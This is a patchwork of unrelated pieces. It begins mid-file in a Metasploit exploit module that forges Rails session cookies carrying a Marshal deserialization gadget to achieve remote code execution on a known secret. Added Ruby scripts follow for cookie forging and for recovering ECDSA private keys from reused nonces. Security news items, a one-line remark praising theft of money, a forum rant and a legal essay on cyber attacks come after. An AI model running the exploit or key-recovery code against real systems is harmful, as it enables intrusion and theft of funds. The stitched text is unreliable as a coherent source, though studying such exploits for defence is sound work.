      @digest = options[:digest] || 'SHA1'
      @serializer = options[:serializer] || Marshal
    end

    def generate(value)
      data = ::Base64.strict_encode64(@serializer.dump(value))
      "#{data}--#{generate_digest(data)}"
    end

    def generate_digest(data)
      require 'openssl' unless defined?(OpenSSL)
      OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data)
    end
  end

  class MessageEncryptor
    module NullSerializer #:nodoc:
      def self.load(value)
        value
      end

      def self.dump(value)
        value
      end
    end

    class InvalidMessage < StandardError; end
    OpenSSLCipherError = OpenSSL::Cipher::CipherError

    def initialize(secret, *signature_key_or_options)
      options = signature_key_or_options.extract_options!
      sign_secret = signature_key_or_options.first
      @secret = secret
      @sign_secret = sign_secret
      @cipher = options[:cipher] || 'aes-256-cbc'
      @verifier = MessageVerifier.new(@sign_secret || @secret, :serializer => NullSerializer)
      # @serializer = options[:serializer] || Marshal
    end

    def encrypt_and_sign(value)
      @verifier.generate(_encrypt(value))
    end

    def _encrypt(value)
      cipher = new_cipher
      cipher.encrypt
      cipher.key = @secret

      # Rely on OpenSSL for the initialization vector
      iv = cipher.random_iv

      #encrypted_data = cipher.update(@serializer.dump(value))
      encrypted_data = cipher.update(value)
      encrypted_data << cipher.final

      [encrypted_data, iv].map {|v| ::Base64.strict_encode64(v)}.join("--")
    end

    def new_cipher
      OpenSSL::Cipher::Cipher.new(@cipher)
    end
  end

  class KeyGenerator
    def initialize(secret, options = {})
      @secret = secret
      @iterations = options[:iterations] || 2**16
    end

    def generate_key(salt, key_size=64)
      OpenSSL::PKCS5.pbkdf2_hmac_sha1(@secret, salt, @iterations, key_size)
    end
  end

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails Known Secret Session Cookie Remote Code Execution',
      'Description'    => %q{
          This module implements Remote Command Execution on Ruby on Rails
          applications. Prerequisite is knowledge of the "secret_token"
          (Rails 2/3) or "secret_key_base" (Rails 4). The values for those
          can be usually found in the file "RAILS_ROOT/config/initializers/secret_token.rb".
          The module achieves RCE by deserialization of a crafted Ruby Object.
      },
      'Author'         =>
        [
          'joernchen of Phenoelit <joernchen[at]phenoelit.de>',
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://charlie.bz/blog/rails-3.2.10-remote-code-execution'], #Initial exploit vector was taken from here
          ['URL', 'http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/']
        ],
      'DisclosureDate' => 'Apr 11 2013',
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        =>
        [
          ['Automatic', {} ]
        ],
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('RAILSVERSION', [ true, 'The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)', 3]),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "GET"]),
        OptString.new('SECRET', [ true, 'The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)', nil]),
        OptString.new('COOKIE_NAME', [ false, 'The name of the session cookie',nil]),
        OptString.new('DIGEST_NAME', [ true, 'The digest type used to HMAC the session cookie','SHA1']),
        OptString.new('SALTENC', [ true, 'The encrypted cookie salt', 'encrypted cookie']),
        OptString.new('SALTSIG', [ true, 'The signed encrypted cookie salt', 'signed encrypted cookie']),
        OptBool.new('VALIDATE_COOKIE', [ false, 'Only send the payload if the session cookie is validated', true]),
      ], self.class)
  end

  #
  # This stub ensures that the payload runs outside of the Rails process
  # Otherwise, the session can be killed on timeout
  #
  def detached_payload_stub(code)
    %Q^
      code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
      if RUBY_PLATFORM =~ /mswin|mingw|win32/
        inp = IO.popen("ruby", "wb") rescue nil
        if inp
          inp.write(code)
          inp.close
        end
      else
        Kernel.fork do
          eval(code)
        end
      end
      {}
    ^.strip.split(/\n/).map{|line| line.strip}.join("\n")
  end

  def check_secret(data, digest)
    data = Rex::Text.uri_decode(data)
    if datastore['RAILSVERSION'] == 3
      sigkey = datastore['SECRET']
    elsif datastore['RAILSVERSION'] == 4
      keygen = KeyGenerator.new(datastore['SECRET'],{:iterations => 1000})
      sigkey = keygen.generate_key(datastore['SALTSIG'])
    end
    digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new(datastore['DIGEST_NAME']), sigkey, data)
  end

  def rails_4
    keygen = KeyGenerator.new(datastore['SECRET'],{:iterations => 1000})
    enckey = keygen.generate_key(datastore['SALTENC'])
    sigkey = keygen.generate_key(datastore['SALTSIG'])
    crypter = MessageEncryptor.new(enckey, sigkey)
    crypter.encrypt_and_sign(build_cookie)
  end

  def rails_3
    # Sign it with the secret_token
    data = build_cookie
    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"), datastore['SECRET'], data)
    marshal_payload = Rex::Text.uri_encode(data)
    "#{marshal_payload}--#{digest}"
  end

  def build_cookie
    # Embed the payload with the detached stub
    code = "eval('" + Rex::Text.encode_base64(detached_payload_stub(payload.encoded)) + "'.unpack('m0').first)"

    if datastore['RAILSVERSION'] == 4
      return "\x04\b" +
        "o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
        ":\x0E@instanceo" +
        ":\bERB\x06" +
        ":\t@src"+ Marshal.dump(code)[2..-1] +
        ":\f@method:\vresult:" +
        "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
    end

    if datastore['RAILSVERSION'] == 3
      return Rex::Text.encode_base64 "\x04\x08" +
        "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
        ":\x0E@instance" +
        "o"+":\x08ERB"+"\x06" +
        ":\x09@src" + Marshal.dump(code)[2..-1] +
        ":\x0C@method"+":\x0Bresult"
    end
  end

  #
  # Send the actual request
  #
  def exploit
    if datastore['RAILSVERSION'] == 3
      cookie = rails_3
    elsif datastore['RAILSVERSION'] == 4
      cookie = rails_4
    end

    cookie_name = datastore['COOKIE_NAME']

    print_status("Checking for cookie #{datastore['COOKIE_NAME']}")

    res = send_request_cgi({
      'uri'     => datastore['TARGETURI'] || "/",
      'method'  => datastore['HTTP_METHOD'],
    }, 25)

    if res && res.headers['Set-Cookie']
      match = res.headers['Set-Cookie'].match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)
    end

    if match
      if match[1] == datastore['COOKIE_NAME']
        print_status("Found cookie, now checking for proper SECRET")
      else
        print_status("Adjusting cookie name to #{match[1]}")
        cookie_name = match[1]
      end

      if check_secret(match[2],match[3])
        print_good("SECRET matches! Sending exploit payload")
      else
        fail_with(Exploit::Failure::BadConfig, "SECRET does not match")
      end
    else
      print_warning("Caution: Cookie not found, maybe you need to adjust TARGETURI")
      if cookie_name.nil? || cookie_name.empty?
        # This prevents trying to send busted cookies with no name
        fail_with(Exploit::Failure::BadConfig, "No cookie found and no name given")
      end
      if datastore['VALIDATE_COOKIE']
        fail_with(Exploit::Failure::BadConfig, "COOKIE not validated, unset VALIDATE_COOKIE to send the payload anyway")
      else
        print_status("Trying to leverage default controller without cookie confirmation.")
      end
    end

    print_status "Sending cookie #{cookie_name}"

    res = send_request_cgi({
      'uri'     => datastore['TARGETURI'] || "/",
      'method'  => datastore['HTTP_METHOD'],
      'headers' => {'Cookie' => cookie_name+"="+ cookie},
    }, 25)

    handler
  end
end
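Added example, not code from the Metasploit module above and not Rails itself: it builds the two cookie formats the module forges (a Rails 3 signed cookie and a Rails 4 encrypted-then-signed cookie), using a harmless session Hash in place of the code-executing Marshal stream, and reproduces the module's check_secret step so the effect of a correct versus a wrong secret can be seen. It follows the module's construction (PBKDF2-HMAC-SHA1 with 1000 iterations and the default salts, AES-256-CBC, HMAC-SHA1, an extra Base64 layer added by the Rails 4 verifier) with one deliberate difference: the encryption key is derived at 32 bytes, because the 2013 module derives 64 bytes and relied on OpenSSL silently truncating it, which current Ruby rejects. The secret and session values are constructed for the example.

```ruby
# Added example (not from the Metasploit module or from Rails).
require 'openssl'
require 'uri'

SALT_ENC = 'encrypted cookie'.freeze            # the module's SALTENC default
SALT_SIG = 'signed encrypted cookie'.freeze     # the module's SALTSIG default
SAMPLE_SESSION = { 'session_id' => 'a1b2c3', 'user_id' => 7 }.freeze  # constructed
DEMO_SECRET = 'f3c1' * 32                                              # constructed, not a real secret

def b64(bytes)
  [bytes].pack('m0')        # strict Base64 without newlines, as Base64.strict_encode64
end

def unb64(text)
  text.unpack1('m0')
end

def hmac_hex(key, data, digest = 'SHA1')
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new(digest), key, data)
end

# Rails 3: "<urlencoded base64(Marshal.dump(session))>--<HMAC-SHA1(secret_token, base64)>"
def rails3_cookie(secret_token, session)
  data = b64(Marshal.dump(session))
  "#{URI.encode_www_form_component(data)}--#{hmac_hex(secret_token, data)}"
end

# Rails 4: both keys come from PBKDF2-HMAC-SHA1(secret_key_base, salt, 1000 iterations).
# 32-byte AES-256 key here (the module asks for 64 and relied on truncation).
def rails4_keys(secret_key_base)
  enc = OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, SALT_ENC, 1000, 32)
  sig = OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, SALT_SIG, 1000, 64)
  [enc, sig]
end

# Rails 4: Marshal stream -> AES-256-CBC -> "b64(ct)--b64(iv)" -> Base64 again by the
# verifier (NullSerializer path in the module) -> "<urlencoded data>--<HMAC-SHA1(sig_key, data)>"
def rails4_cookie(secret_key_base, session)
  enc_key, sig_key = rails4_keys(secret_key_base)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = enc_key
  iv = cipher.random_iv
  ciphertext = cipher.update(Marshal.dump(session)) + cipher.final
  data = b64("#{b64(ciphertext)}--#{b64(iv)}")
  "#{URI.encode_www_form_component(data)}--#{hmac_hex(sig_key, data)}"
end

# The module's check_secret: URL-decode the data half and recompute the HMAC with the
# candidate secret (raw secret_token for Rails 3, derived signing key for Rails 4).
# A plain == is used here; a production verifier compares in constant time.
def secret_matches?(cookie, secret, rails_version)
  data, digest = cookie.split('--', 2)
  data = URI.decode_www_form_component(data)
  key = rails_version == 4 ? rails4_keys(secret)[1] : secret
  hmac_hex(key, data) == digest
end

# Verify first, then (Rails 4) decrypt, then unmarshal. Marshal.load on
# attacker-controlled bytes is the sink the module abuses; it is only safe here
# because the HMAC check runs before it. Returns nil when the secret is wrong.
def decode_session(cookie, secret, rails_version)
  return nil unless secret_matches?(cookie, secret, rails_version)
  plain = unb64(URI.decode_www_form_component(cookie.split('--', 2).first))
  if rails_version == 4
    ct_b64, iv_b64 = plain.split('--')
    cipher = OpenSSL::Cipher.new('aes-256-cbc')
    cipher.decrypt
    cipher.key = rails4_keys(secret).first
    cipher.iv = unb64(iv_b64)
    plain = cipher.update(unb64(ct_b64)) + cipher.final
  end
  Marshal.load(plain)
end

if __FILE__ == $0
  [3, 4].each do |v|
    cookie = v == 3 ? rails3_cookie(DEMO_SECRET, SAMPLE_SESSION) : rails4_cookie(DEMO_SECRET, SAMPLE_SESSION)
    puts "Rails #{v}: right secret=#{secret_matches?(cookie, DEMO_SECRET, v)} " \
         "wrong secret=#{secret_matches?(cookie, 'wrong', v)} " \
         "session=#{decode_session(cookie, DEMO_SECRET, v).inspect}"
  end
end
```

The point the module depends on is visible in decode_session: once the HMAC passes, the server hands the bytes to Marshal.load without further checks, so whoever holds the secret chooses what object gets instantiated. Rotating a leaked secret_token/secret_key_base invalidates every cookie at once, which is the only remediation that works for this class of issue.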
-
Kaspersky Lab experts recorded a 1.4 percentage point increase in June in the share of spam in total email traffic, which reached an average of 71.1%. Malware attachments were identified in 1.8% of all emails, one percentage point less than in the previous month.

In June, spammers made active use of the name of Apple founder Steve Jobs. In the subject line of the unsolicited message, the recipient was invited to learn the secret of the businessman's success, but the body of the message contained an advertisement for a series of free courses. Their organisers promised that in only 1.5 hours they could teach anyone to turn a hobby into a profitable business. Steve Jobs' name was used to draw attention to the training programme.

Besides the messages promoting training courses and promising to reveal the secret of Steve Jobs' success, several spam messages offering significant discounts on Apple products were identified in June. To make the emails look legitimate, the scammers put the company's name in the 'From' field, although the email address used had no connection with Apple. The authors of these messages stressed that only a limited number of products remained and that it was essential for interested persons to buy them before stock ran out. This common trick was used to push the user into deciding as quickly as possible and going straight to the link sent in order to place the order.

Another subject exploited by spammers was offers of admission to universities in the USA, as well as other offers of online courses that could be made available to users. These emails often included links to pages with registration forms for the course in question. However, the web page addresses varied from email to email and were often created on the very day the message was sent. This was probably the method by which the authors of the mass mailings collected personal data about users.

"In June, spammers continued to use the familiar tricks," commented Tatyana Shcherbakova, Senior Spam Analyst at Kaspersky Lab. "Several series of mass mailings stood out, however, promoting conventional and electronic cigarettes, for which the authors used the Google Translate service. In addition, the spammers appended to the end of these links a randomly generated set of letters and the names of Google domains in different languages," said Tatyana Shcherbakova.

As in the previous month, a large share of the total volume of spam worldwide came from China (24%) and the USA (17%). South Korea ranked third, being responsible for 14% of all spam messages. South Korea remained the main source of spam for users in Europe (53.3%), its contribution growing by 9.6 percentage points in June. The United States (4.6%) and Vietnam (3.7%) dropped to fourth and fifth place respectively, ceding the previous month's positions to Italy (6.7%) and Taiwan (5%). Italy's contribution grew by 3.9 percentage points compared with May, when it was only seventh in the ranking.

Malware attachments were detected in 1.8% of all emails sent. As in the previous month, scammers used their favourite trick: notifications that appear to come from very well-known companies. In June, the number of attacks targeting email and instant messaging services changed significantly, because during the summer holiday period the number of users of email and of ICQ, Jabber, Skype etc. also increases. There is very high demand for this type of account on the black market, which encourages phishers to try ever harder to obtain such information.

The full version of the report on the evolution of spam in June 2013 is available at: securelist.com

Source FaraVirusi.Com
-
I think it's brilliant to steal people's money this way.
-
$649,000 is the average cost companies have to bear after a cyber attack, according to the 2013 Global Corporate IT Security Risks study conducted by B2B International in partnership with Kaspersky Lab.

Any cyber attack can harm a company, but B2B International analysed how that damage can be quantified in financial terms. In 2013, B2B International experts calculated the losses resulting from cyber attacks, based on the results of research involving several companies around the world. To make the cost estimate as accurate as possible, B2B analysed only incidents that occurred in the last 12 months, and the assessment was based on information about losses suffered as a direct result of security incidents. The costs include two main components:

- Damage caused by the incident itself, for example losses from leaks of confidential information, from interruption of business continuity and from the cost of hiring specialists to remediate the incidents;
- Costs associated with unplanned reactions needed to prevent similar attacks in the future, including hiring/training employees, hardware and software and other infrastructure upgrades.

The researchers did not include in this analysis data on some losses and costs suffered by a small number of companies, such as costs related to the need to issue a public statement about the incident.

Cost structure

One of the first conclusions was that the largest losses are caused by the incident itself: lost opportunities and profits, as well as payments to the specialists handling remediation, with average costs of $566,000. Costs related to proactive actions, such as hiring new people and training them, as well as upgrading hardware and software infrastructure, can reach approximately $83,000.

Damage can vary depending on the region in which the attacked company operates. For example, the greatest damage was associated with incidents involving companies operating in North America, reaching an average of $818,000. The sum was only slightly smaller in South America, at $813,000. After cyber attacks, companies in Europe recorded a slightly lower but still substantial average loss of $627,000.

Costs for SMEs

The costs of cyber attacks whose victims are small and medium-sized companies are lower than those of large corporations. However, given the size of these companies, the sums are still a heavy blow. The average loss recorded after IT security incidents affecting SMEs was $50,000, of which $36,000 represented the cost of the incident itself, while the rest, $14,000, represents associated expenses. The SMEs that recorded the highest average cost after cyber attacks were those in Asia-Pacific, with losses of $96,000. In Europe this sum was $55,000, and in South America $45,000. The lowest losses recorded after cyber attacks were those in Russia, where the average was $21,000.

The analysis also revealed that, in certain cases, the financial losses suffered by small companies are accompanied by other losses, amounting to approximately 5% of annual revenue. For example, one company lost all of its business in a region where it had previously been successful because of such an incident.

Optimal protection

A very important conclusion that can be drawn from this study is that even the most destructive and costly attacks could have been prevented. The attacks exploited gaps in the company's security that could have been remedied if the corporations had used IT security solutions and managed their IT infrastructure properly. The Kaspersky Endpoint Security for Business solution provides effective protection against all types of cyber threats, including targeted attacks. The product also provides key functions such as automated patch management and vulnerability scanning, capable of ensuring regular and consistent updates for the company's devices, as well as the secure integration of mobile devices into the company network.

Typically, companies that fall into the trap of cyber attacks come to understand the importance and value of these security solutions only after the incidents have occurred, exposing themselves to additional financial losses that could have been prevented. A simple comparison between the level of cost and of losses caused by a cyber attack shows that, in most cases, investing in a quality, effective security solution would have cost considerably less than the costs arising from the losses.

Source FaraVirusi.Com
-
The USA's National Security Agency (NSA) has issued a document titled The National Security Agency: Missions, Authorities, Oversight and Partnerships (PDF) that explains some of its operations and includes a claim it “... touches about 1.6%... “ of daily Internet traffic and “...only 0.025% is actually selected for review.”

Released on Saturday with little fanfare, the document's prologue explains that the NSA lacked tools to track one of the 9/11 hijackers. As a result “Several programs were developed to address the U.S. Government's needs to connect the dots of information available to the intelligence community and to strengthen the coordination between foreign intelligence and domestic law enforcement agencies.”

It goes on to explain the legal underpinnings of the Agency's work and identify the following methodology for its work:

1. NSA identifies foreign entities (persons or organizations) that have information responsive to an identified foreign intelligence requirement. For instance, NSA works to identify individuals who may belong to a terrorist network.
2. NSA develops "the network" with which that person or organisation's information is shared or the command and control structure through which it flows. In other words, if NSA is tracking a specific terrorist, NSA will endeavor to determine who that person is in contact with, and who he is taking direction from.
3. NSA identifies how the foreign entities communicate (radio, e-mail, telephony, etc.)
4. NSA then identifies the telecommunications infrastructure used to transmit those communications.
5. NSA identifies vulnerabilities in the methods of communication used to transmit them.
6. NSA matches its collection to those vulnerabilities, or develops new capabilities to acquire communications of interest if needed.

The money shot comes in a section titled “Scope and Scale of NSA Collection” that reads as follows:

“According to figures published by a major tech provider, the Internet carries 1,826 Petabytes of information per day. In its foreign intelligence mission, NSA touches about 1.6% of that. However, of the 1.6% of the data, only 0.025% is actually selected for review. The net effect is that NSA analysts look at 0.00004% of the world's traffic in conducting their mission – that's less than one part in a million.”

It also means the NSA is “touching” a couple of terabytes a day. And let's also ponder just what “selected for review” means. Is it reading by humans? Processing by machines?

The NSA would have us believe that whatever's going on, “NSA personnel are obliged to report when they believe NSA is not, or may not be, acting consistently with law, policy, or procedure.”

“This self-reporting is part of the culture and fabric of NSA,” the document continues. “If NSA is not acting in accordance with law, policy, or procedure, NSA will report through its internal and external intelligence oversight channels, conduct reviews to understand the root cause, and make appropriate adjustments to constantly improve.”

The Reg imagines leakers working for contractors were not on the NSA's list of “external intelligence oversight channels”. Edward Snowden thrusting himself into that role may be the reason this document was published. ®

Bootnote

Here at Vulture South we write in a word processor (Lotus Symphony) and then enter the results into The Reg's content management system. While cutting and pasting sections of the document into Symphony, we found some oddities. For example, the list describing the NSA's methodology, in point 2, looks like this even when pasted unformatted:

We found several such instances throughout the document and imagine it is the NSA's idea of a joke.

Source TheRegister.co.uk
-
Users of Android Bitcoin apps have woken to the unpleasant news that an old pseudo random number generation bug has been exploited to steal balances from users' wallets. The Bitcoin Foundation's announcement, here, merely states that an unspecified component of Android “responsible for generating secure random numbers contains critical weaknesses, that render all Android wallets generated to date vulnerable to theft.” Such wallets would include Bitcoin Wallet, blockchain.info wallet, BitcoinSpinner and Mycelium Wallet. The problem is this: the elliptic curve digital signature algorithm – ECDSA – demands that the random number used to sign a private key is only ever used once. If the random number generator is used twice, the private key is recoverable. This blog post, describing a presentation given at the RSA conference in March, gives a hint at what's going on. It described how the Java class SecureRandom (used by the vulnerable wallets) can generate collisions for the value r. Moreover, r collisions appear to have been spotted in the wild as early as January – although the author of that post, Nils Schneider, did not link the collision to SecureRandom. According to The Genesis Block, SecureRandom was flagged by Google's Mike Hearn as the problem, in an e-mail to Bitcoin developers: “Android phones/tablets are weak and some signatures have been observed to have colliding R values, allowing the private key to be solved and money to be stolen”. Hearn says the Bitcoin Wallet app “has been prepared that bypasses the system SecureRandom implementation and reads directly from /dev/urandom instead, which is believed to be functioning correctly. All unspent outputs in the wallet are then respent to this new key.” Given, however, the prior observations both of Bitcoin signature collisions and SecureRandom problems, The Register has asked Hearn if developers should have been advised to avoid SecureRandom sooner. ® Source TheRegister.co.uk
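Added example, not code from the Register article, from any of the wallets named or from bitcoinj: a minimal ECDSA over secp256k1 (the curve Bitcoin uses) in pure Ruby that signs two different messages with the same nonce k and then recovers the private key from the pair of signatures. This is exactly the failure the post describes: two signatures that share the value r were made with the same k, and from r, the two s values and the two message hashes the private key falls out with a few modular operations. The private key, nonce and messages are constants made up for the example; the curve parameters are the published secp256k1 values.

```ruby
# Added example (not from the article or any wallet): secp256k1 ECDSA with an
# explicit nonce, and private-key recovery from two signatures that reused it.
require 'digest'

# secp256k1 domain parameters: y^2 = x^3 + 7 over F_P, base point G of order N
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = [0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8]

# Modular inverse by Fermat's little theorem (m is prime for both P and N).
def inv(x, m)
  (x % m).pow(m - 2, m)
end

# Affine point addition; nil is the point at infinity.
def point_add(a, b)
  return b if a.nil?
  return a if b.nil?
  x1, y1 = a
  x2, y2 = b
  if x1 == x2
    return nil if (y1 + y2) % P == 0             # a + (-a) = infinity
    lam = 3 * x1 * x1 * inv(2 * y1, P) % P       # tangent slope (curve coefficient a = 0)
  else
    lam = (y2 - y1) * inv(x2 - x1, P) % P
  end
  x3 = (lam * lam - x1 - x2) % P
  [x3, (lam * (x1 - x3) - y1) % P]
end

# Double-and-add scalar multiplication.
def point_mul(k, pt)
  result = nil
  addend = pt
  while k > 0
    result = point_add(result, addend) if k.odd?
    addend = point_add(addend, addend)
    k >>= 1
  end
  result
end

def hash_int(msg)
  Digest::SHA256.hexdigest(msg).to_i(16)        # z, the message hash as an integer
end

# ECDSA signature with a caller-supplied nonce k, so the reuse can be forced.
def ecdsa_sign(d, msg, k)
  r = point_mul(k, G)[0] % N
  s = inv(k, N) * (hash_int(msg) + r * d) % N
  [r, s]
end

def ecdsa_verify(pub, msg, sig)
  r, s = sig
  w = inv(s, N)
  z = hash_int(msg)
  pt = point_add(point_mul(z * w % N, G), point_mul(r * w % N, pub))
  !pt.nil? && pt[0] % N == r
end

# Two signatures with equal r were made with the same k. Then, mod N:
#   s1 - s2 = k^-1 (z1 - z2)  =>  k = (z1 - z2) / (s1 - s2)
#   s1 = k^-1 (z1 + r d)      =>  d = (s1 k - z1) / r
def recover_private_key(msg1, sig1, msg2, sig2)
  r1, s1 = sig1
  r2, s2 = sig2
  raise ArgumentError, 'signatures do not share r; the nonce was not reused' unless r1 == r2
  z1 = hash_int(msg1)
  z2 = hash_int(msg2)
  k = (z1 - z2) * inv(s1 - s2, N) % N
  (s1 * k - z1) * inv(r1, N) % N
end

# Constructed demo values (not a real key or nonce).
DEMO_PRIV  = 0x1E99423A4ED27608A15A2616A2B0E9E52CED330AC530EDCC32C8FFC6A526AEDD
DEMO_NONCE = 0x6F3D5C5EF2D8A7B4C1E0F9A8B7C6D5E4F3A2B1C0D9E8F7A6B5C4D3E2F1A0B9C8
MSG1 = 'spend 1 BTC to alice'
MSG2 = 'spend 2 BTC to bob'

def demo
  pub  = point_mul(DEMO_PRIV, G)
  sig1 = ecdsa_sign(DEMO_PRIV, MSG1, DEMO_NONCE)
  sig2 = ecdsa_sign(DEMO_PRIV, MSG2, DEMO_NONCE)   # same k twice: the wallet bug
  recovered = recover_private_key(MSG1, sig1, MSG2, sig2)
  { valid1: ecdsa_verify(pub, MSG1, sig1), valid2: ecdsa_verify(pub, MSG2, sig2),
    same_r: sig1[0] == sig2[0], recovered: recovered == DEMO_PRIV }
end

puts demo.inspect if __FILE__ == $0
```

Both signatures verify, so nothing in the signatures themselves looks wrong to a verifier; the only visible symptom is the repeated r on the block chain, which is what the observers mentioned in the article spotted. Deterministic nonces derived from the private key and message (RFC 6979) remove the dependency on the platform RNG entirely, which is why that is the usual fix rather than swapping one random source for another.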
-
How many networks do you want to run to enable the internet of bits? A group of researchers from Greece's University of Thessaly and the Centre for Research and Technology Hellas believe there's scope for energy consumption reductions of as much as 75 percent if 802.11n's energy saving extensions are combined with frame aggregation techniques. The reason this is important? Because, as wireless devices outrun fixed connections for existing users, new users, and the default connection type for the much-touted Internet of Bits (which Vulture South hopes becomes known as the iNoB), power consumption out at the edge of the Internet is going to be a shocker. For example, earlier this year the University of Melbourne's Centre for Energy Efficient Telecommunications (CEET) stated that the network edge is responsible for around ten times the energy consumption attributable to data centres. As the number of end user devices skyrockets, so will the amount of energy consumed in the access network to serve them. CEET also predicts that the “wireless cloud” will demand more than 4.5 times as much electricity in 2015 than it did in 2012. While 802.11n includes a variety of power saving modes, these focus on sleep and idle modes – they don't save power if the interface is active. Getting transmit/receive power consumption down is much harder. Which brings us back to the Thessaly/CRTH benchmarking work published at Arxiv, here. Among other things, the researchers demonstrate that frame aggregation can have a big impact on power consumption in the 802.11n world. With A-MPDU aggregation active, the researchers found, the energy consumption per transmitted bit is 75 percent lower than without aggregation. A last word: we all know that 802.11n can in theory hum along at up to 600Mbps. The current favorite for internet of things wireless connections, over short distances at least, is Bluetooth SMART (aka Bluetooth Low-Energy or BLE) which operates at up to 24 Mbps. 
Few remote sensors will need 802.11n's speed, but few organisations like the idea of running multiple networks. If frame aggregation helps to get 802.11n power consumption competitive with Bluetooth, it could make single-network sensor strategies sensible. ® Source TheRegister.co.uk
-
Hey people, you already have a dedicated topic with 1000000000000000000000000000 posts for invites, for fuck's sake. You're so idiotic that you can't even run a search on the forum. https://rstforums.com/forum/24670-invitatii-filelist-invitatie-demonoid-invitatie-lasttorrents-invitatii-trackere.rst The first post says it clearly: Dump whatever the fuck you want in that topic. The kids who make an account just to beg for tracker invites have driven me to despair. Not for anything else, but you've filled the forum with "invite and account requests", nothing but users with brand-new accounts, and in every topic there's a post begging for an invite, which of course none of the moderators ever sees.
-
Part I : https://rstforums.com/forum/73435-fitting-cyber-attacks-jus-ad-bellum-consequence-based-approach-part-i.rst
Part II : https://rstforums.com/forum/73508-fitting-cyber-attacks-jus-ad-bellum-consequence-based-approach-part-ii.rst

I. Criticism and possible flaws of the consequence-based approach and the seven-factor test

There are people from the field of law, and not only, who do not think that everything about fitting cyber attacks to the law on the resort to force with the help of the consequence-based approach will go smooth and silky. One of them, Jason Barkham, is highly critical of Michael Schmitt's seven-factor test and of the consequence-based theory as a whole.

Low-level cyber attacks

To begin with, the comparison with, analysis of, and adherence to conventional military force do not correspond well with such an innovative form of warfare as cyber attacks represent. Moreover, Schmitt's method cannot cope properly with low-level cyber attacks, because they fall outside the use-of-force range under his analysis. In the event of a real attack, the target would just have to guess whether its magnitude is significant enough (Barkham, 2001).

Presumptive legitimacy factor

On the other hand, the legitimacy factor has an improper function. The main question in a given case is whether a cyber attack is a use of force or a mere act of coercion; the former is illegitimate and the latter is legitimate, at least in the eyes of Article 2(4) of the UN Charter. Then, assuming in advance that an act is legitimate in order to establish at some later point whether it is force or coercion is devoid of sense. "In effect," Barkham (2001, pp. 85-86) writes, "Schmitt's approach is backwards, because it requires determining the legitimacy of an attack under the international law (i.e., distinguishing between acts of coercion and uses of force) by asking whether the attack is legitimate."

Analysis after the fact

Another important blemish is the consideration that cyber attacks "cannot be assessed readily at the time of the attack to determine their magnitude and permitted responses" (Barkham, 2001, p. 86). Any framework that requires ex-post analysis would be ineffective at solving this problem. Adding to this the inherent feature of these types of aggression, namely the severe obstacles to identifying the wrongdoer (the attribution problem), we can recognize the reason that would probably make it imperative to wait before responding (Barkham, 2001). Because the consequences need to be readily available, the demand for accurate analytical results under the methodology in question would require the victim state to wait for the attack to commence. Undoubtedly, this prudent behaviour would considerably diminish the chances of a successful defence, especially if the attack is ongoing and the victim state needs to react immediately to protect itself. Therefore, a post factum analysis most likely has no alternative, due to the specific nature of cyber attacks, which can undergo quick modifications and in an instant shift from an act with perfectly legal status to a severe violation of jus ad bellum (Ophardt, 2010).

The following statement comes as a direct continuation of the previous point: "the greatest flaw in Schmitt's proposal" is its inability to cope with the flexible nature of cyber attacks: "states faced with a decision of how to respond to a cyber attack that could quickly morph into clearly aggressive act lack guidance on the appropriate response" (Ophardt, 2010, p. 24). Curiously, even the aggressor may not know exactly what kind of consequences are going to crop up after a given cyber attack takes place. Consequently, the wrongdoer may have serious difficulties assessing the exact outcome of the attack and considering all possibilities, such as secondary and tertiary effects (Hathaway et al., 2012).

Nevertheless, Sklerov speaks in defence of the consequence-based approach, asserting that "in no way does effects-based analysis require a state to delay its response until it can fully measure a computer network attack against all six of Schmitt's proposed axes. Decision-makers, at times, must make choice with imperfect information" (Sklerov, 2009, p. 70).

Additional questions that need resolution

The application of the consequence-based interpretation leads to the emergence of insidious secondary questions with regard to:

- Proportionality of an armed response: it is difficult to assess the consequences and measure the eventual casualties.
- Imminence: it is difficult to discern the onset of a cyber assault, and typically the attack sequence happens in split seconds.
- Responsibility: the attribution dilemma is inevitably bound to cause doubts about protagonist non-state actors with loose relationships to states (Waxman, 2013).

Consequence-based approach and politics

As one scholar notes: "Very challenging for lawyers applying an effect-based (consequence-based) analysis, it may not be quite so problematic in practice, because States are unlikely to respond to small-scale attacks with military force" (Waxman, 2013, p. 120). Political planners and decision-makers will face very challenging situations when they bid for domestic support for more drastic responses, that is, military action against isolated cyber attacks which do not breed significant, publicly discernible consequences.
By comparison, in the case of low-level hostile kinetic assaults a counterattack is practically not only justified but politically demanded (Waxman, 2013).

